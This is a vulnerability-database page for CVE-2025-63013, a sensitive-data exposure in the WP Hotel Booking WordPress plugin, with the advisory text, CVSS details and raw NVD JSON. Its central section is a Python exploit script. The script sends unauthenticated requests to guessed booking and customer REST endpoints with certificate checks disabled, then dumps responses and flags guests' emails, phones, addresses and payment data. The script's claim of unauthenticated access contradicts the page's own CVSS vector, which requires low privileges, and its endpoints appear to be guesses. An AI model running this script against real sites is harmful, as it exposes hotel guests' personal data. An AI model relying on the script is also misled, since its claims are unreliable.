Security Vulnerability Report
中文
CVE-2025-63013 CVSS 4.3 MEDIUM

CVE-2025-63013

Published: 2025-12-09 16:18:07
Last Modified: 2026-04-27 19:16:18

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThimPress WP Hotel Booking wp-hotel-booking allows Retrieve Embedded Sensitive Data.This issue affects WP Hotel Booking: from n/a through <= 2.2.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Hotel Booking <= 2.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63013 PoC - WP Hotel Booking Sensitive Data Exposure # Affected: WP Hotel Booking <= 2.2.7 import requests import sys def exploit_wp_hotel_booking(target_url): """ Exploit for CVE-2025-63013: Sensitive Information Exposure in WP Hotel Booking This PoC demonstrates how an unauthenticated attacker can retrieve sensitive data """ # Common endpoints that might leak data endpoints = [ "/wp-json/wp-hotel-booking/v1/bookings", "/wp-json/wp-hotel-booking/v1/customers", "/wp-json/wp-hotel-booking/v1/bookings?per_page=100", "/?rest_route=/wp-hotel-booking/v1/bookings", "/?rest_route=/wp-hotel-booking/v1/customers" ] print(f"[*] Target: {target_url}") print(f"[*] CVE-2025-63013 WP Hotel Booking Sensitive Data Exposure\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"[*] Testing endpoint: {endpoint}") try: # Send GET request without authentication response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] SUCCESS! Data leaked from {endpoint}") print(f"[+] Response preview: {response.text[:500]}...") # Check for sensitive data patterns sensitive_patterns = ['email', 'phone', 'address', 'payment', 'name'] for pattern in sensitive_patterns: if pattern.lower() in response.text.lower(): print(f"[!] Sensitive data found containing '{pattern}'") elif response.status_code == 401: print(f"[-] Endpoint requires authentication: {endpoint}") else: print(f"[-] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") print("\n[*] PoC execution completed") print("[*] Recommended action: Upgrade WP Hotel Booking to version > 2.2.7") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1] exploit_wp_hotel_booking(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63013", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:06.853", "lastModified": "2026-04-27T19:16:17.990", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in ThimPress WP Hotel Booking wp-hotel-booking allows Retrieve Embedded Sensitive Data.This issue affects WP Hotel Booking: from n/a through <= 2.2.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-hotel-booking/vulnerability/wordpress-wp-hotel-booking-plugin-2-2-7-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}